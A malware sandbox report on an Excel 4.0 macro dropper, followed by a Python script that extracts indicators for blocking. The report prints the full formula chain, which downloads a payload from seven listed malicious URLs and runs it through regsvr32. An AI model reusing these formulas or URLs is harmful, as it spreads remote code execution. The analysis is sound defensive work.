General

  • Target

    201417f7cbaa4eaacac2c74854ea2b5a7e683ca636e499bd6cb4895d198176db

  • Size

    74KB

  • Sample

    241120-wvddbs1flr

  • MD5

    7f83c0b2ef2a5dc0300d7eec9b986ddc

  • SHA1

    d6be7205d8e582a8f91d49979a49f9344bb24c0f

  • SHA256

    201417f7cbaa4eaacac2c74854ea2b5a7e683ca636e499bd6cb4895d198176db

  • SHA512

    4835a09656a0498765dd9cfd9e7c9fbbf926495fc6e1ba69106d12739f725f1442aa18619b86f612e1791dcc2c65eb6ef6c68d15799111d598ea3e07811e5d66

  • SSDEEP

    1536:4qSto0NSVUINwtzLT7OMuuAe0yOcfpXZGsM9VIzB3g:43tzSmICpH7OZuvZGsMl

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://part-co.org/wp-admin/u4NPmsvZ3EWBa8tYlZv/

https://protokol.mx/Archivos/HgTqbLkgrgLAvunV/

http://letea.eu/wp-content/CgaqeucmpVT2NEK/

http://ponizinny.nl/wp-admin/KdLO9n/

http://sport-foto.nu/wp-content/Jqf9mfIPcA/

http://www.citybridgesc.at/Ergebnisse/K7mPH42tTl7slZgWH/

http://life.lst.dx.am/img/WNIWv/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://part-co.org/wp-admin/u4NPmsvZ3EWBa8tYlZv/","..\rds.ocx",0,0)
    =IF('EEGVWE'!E8<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://protokol.mx/Archivos/HgTqbLkgrgLAvunV/","..\rds.ocx",0,0))
    =IF('EEGVWE'!E10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://letea.eu/wp-content/CgaqeucmpVT2NEK/","..\rds.ocx",0,0))
    =IF('EEGVWE'!E12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ponizinny.nl/wp-admin/KdLO9n/","..\rds.ocx",0,0))
    =IF('EEGVWE'!E14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://sport-foto.nu/wp-content/Jqf9mfIPcA/","..\rds.ocx",0,0))
    =IF('EEGVWE'!E16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.citybridgesc.at/Ergebnisse/K7mPH42tTl7slZgWH/","..\rds.ocx",0,0))
    =IF('EEGVWE'!E18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://life.lst.dx.am/img/WNIWv/","..\rds.ocx",0,0))
    =IF('EEGVWE'!E20<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rds.ocx")
    =RETURN()

Extracted

Language
xlm4.0

Source          URL
xlm40.dropper   http://part-co.org/wp-admin/u4NPmsvZ3EWBa8tYlZv/
xlm40.dropper   https://protokol.mx/Archivos/HgTqbLkgrgLAvunV/
xlm40.dropper   http://letea.eu/wp-content/CgaqeucmpVT2NEK/
xlm40.dropper   http://ponizinny.nl/wp-admin/KdLO9n/
xlm40.dropper   http://sport-foto.nu/wp-content/Jqf9mfIPcA/
xlm40.dropper   http://www.citybridgesc.at/Ergebnisse/K7mPH42tTl7slZgWH/
xlm40.dropper   http://life.lst.dx.am/img/WNIWv/
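The formula chain listed under Attributes is a fallback-download loop: every CALL to urlmon!URLDownloadToFileA writes to the same relative path ..\rds.ocx, each following IF tests the cell holding the previous call's return value (a failed HRESULT is negative when read as the signed long declared by the leading J in "JJCCBB"), CLOSE(0) closes the workbook without saving when every URL has failed, and EXEC hands the dropped file to regsvr32 -s, which silently runs its DllRegisterServer export. The script below is an added example for this report, not part of the sandbox's own tooling: it parses that chain out of the listed formulas (embedded here as constructed input so it runs offline) and returns the URLs, hosts, drop path, guard cells and post-download command a responder would block or hunt for. The regex patterns, function names and the fallback-chain heuristic are mine.

```python
"""Pull indicators out of an Excel 4.0 (XLM) download-and-register macro chain.

Added example for this report, not the sandbox's own code. Input is the
formula chain the report lists, embedded as a constant so the script runs
offline; patterns, names and the chain heuristic are assumptions of mine.
"""
import re
from urllib.parse import urlsplit

# Constructed input: the extracted formulas from the report, one per line.
XLM_FORMULAS = r'''
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://part-co.org/wp-admin/u4NPmsvZ3EWBa8tYlZv/","..\rds.ocx",0,0)
=IF('EEGVWE'!E8<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://protokol.mx/Archivos/HgTqbLkgrgLAvunV/","..\rds.ocx",0,0))
=IF('EEGVWE'!E10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://letea.eu/wp-content/CgaqeucmpVT2NEK/","..\rds.ocx",0,0))
=IF('EEGVWE'!E12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ponizinny.nl/wp-admin/KdLO9n/","..\rds.ocx",0,0))
=IF('EEGVWE'!E14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://sport-foto.nu/wp-content/Jqf9mfIPcA/","..\rds.ocx",0,0))
=IF('EEGVWE'!E16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.citybridgesc.at/Ergebnisse/K7mPH42tTl7slZgWH/","..\rds.ocx",0,0))
=IF('EEGVWE'!E18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://life.lst.dx.am/img/WNIWv/","..\rds.ocx",0,0))
=IF('EEGVWE'!E20<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rds.ocx")
=RETURN()
'''

# CALL("urlmon","URLDownloadToFileA",<type text>,<caller>,<url>,<dest>,<reserved>,<callback>)
DOWNLOAD_RE = re.compile(
    r'CALL\("urlmon","URLDownloadToFileA","(?P<sig>[A-Z]+)",\d+,'
    r'"(?P<url>[^"]+)","(?P<path>[^"]+)",\d+,\d+\)'
)
# IF('sheet'!cell<0, ...): the cell holds the previous CALL's HRESULT; failures
# (0x8xxxxxxx) are negative as the signed long the leading "J" declares.
GUARD_RE = re.compile(r"^=IF\('(?P<sheet>[^']+)'!(?P<cell>[A-Z]+\d+)<0,")
EXEC_RE = re.compile(r'EXEC\("(?P<cmd>[^"]+)"\)')
CLOSE_RE = re.compile(r"CLOSE\((?P<save>\d)\)")  # CLOSE(0): close without saving


def parse_dropper(formulas: str) -> dict:
    """Walk the formula chain and collect download URLs, drop paths, the
    guard cells each retry checks, EXEC commands and whether it self-closes."""
    result = {"urls": [], "drop_paths": [], "guard_cells": [],
              "exec": [], "close_without_save": False}
    for line in formulas.strip().splitlines():
        line = line.strip()
        if not line:
            continue
        guard = GUARD_RE.match(line)
        if guard:
            result["guard_cells"].append(f"{guard['sheet']}!{guard['cell']}")
        dl = DOWNLOAD_RE.search(line)
        if dl:
            result["urls"].append(dl["url"])
            if dl["path"] not in result["drop_paths"]:
                result["drop_paths"].append(dl["path"])
        ex = EXEC_RE.search(line)
        if ex:
            result["exec"].append(ex["cmd"])
        cl = CLOSE_RE.search(line)
        if cl and cl["save"] == "0":
            result["close_without_save"] = True
    return result


def hosts(urls) -> list:
    """Unique hostnames for a DNS/proxy blocklist, sorted for stable output."""
    return sorted({urlsplit(u).hostname for u in urls})


def is_download_fallback_chain(parsed: dict) -> bool:
    """Heuristic (mine): several URLs racing into one drop path, each retry
    guarded by the previous attempt's return value, and the dropped file then
    passed to a command line (here regsvr32) for execution."""
    if len(parsed["urls"]) < 2 or len(parsed["drop_paths"]) != 1:
        return False
    if len(parsed["guard_cells"]) < len(parsed["urls"]) - 1:
        return False
    basename = parsed["drop_paths"][0].split("\\")[-1]
    return any(basename in cmd for cmd in parsed["exec"])


if __name__ == "__main__":
    parsed = parse_dropper(XLM_FORMULAS)
    print("fallback chain:", is_download_fallback_chain(parsed))
    print("drop path:", parsed["drop_paths"], "exec:", parsed["exec"])
    for h in hosts(parsed["urls"]):
        print("block host:", h)
```

The guard cells (E8, E10, ... E20 on sheet EEGVWE) are the cells the CALL formulas themselves occupy, so hunting for the same pattern in other workbooks should key on the IF(...<0, CALL("urlmon",...)) shape rather than on cell addresses, which change per sample.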
